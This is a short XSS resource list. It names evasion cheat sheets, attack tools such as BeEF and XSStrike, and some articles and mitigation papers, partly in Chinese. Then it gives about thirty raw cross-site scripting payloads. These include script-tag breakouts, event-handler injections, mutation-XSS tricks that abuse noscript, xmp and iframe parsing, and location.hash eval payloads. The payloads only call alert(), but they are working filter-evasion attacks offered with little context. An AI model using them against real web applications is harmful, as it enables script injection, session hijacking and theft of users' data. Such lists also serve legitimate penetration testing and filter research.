XSS_Filter_Evasion_Cheat_Sheet
Sec-wiki XSS
XSS过滤绕过速查表
xssed
Beef
XSStrike
xssor2
xssfork
XSS-Filter-Evasion-Cheat-Sheet-CN
Bypass XSS Protection with xmp, noscript, noframes.. etc
XSS attacks on Googlebot allow search index manipulation
A WOrmable XSS on HackMD
Breaking XSS mitigations via Script Gadgetspocs
Security Safe HTML
Reducing XSS by way of Automatic Context-Aware Escaping in Template Systems
Fighting XSS with Isolated Scripts
Google搜索中的突变XSS
特斯拉上价值10000美元的XSS漏洞
<script>alert(1)</script>
"><script>alert(1)</script>
"><script>alert(document.domain)</script>
"><script>alert(1)</script><"
'"><script>alert(1)</script>
'"><script>alert(1)</script>"
';"<script>alert(1)</script>
</script><script>alert(1)</script>
<img src='' onerror=alert(/poc/)>
<img src=1 alt="xss"onerror=alert(1);//">
<DIV STYLE="width: expression(alert('XSS'));">
"><BODY ONLOAD=alert(1)>,1/
</title><script>alert(/poc/)</script>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<noscript><p title="</noscript><svg/onload=alert(1)>">
<xmp><p title="</xmp><svg/onload=alert(1)>">
<noframes><p title="</noframes><svg/onload=alert(1)>">
<iframe><p title="</iframe><svg/onload=alert(1)>">
<iframe style="visibility:hidden"><p title="</iframe><svg/onload=alert(1)>">
<svg onload=alert(document.domain)>
location:
<body/onload=eval(location.hash.slice(1))>#alert(1)
<body/onload=setTimeout(location.hash.substr(1))>#alert(1)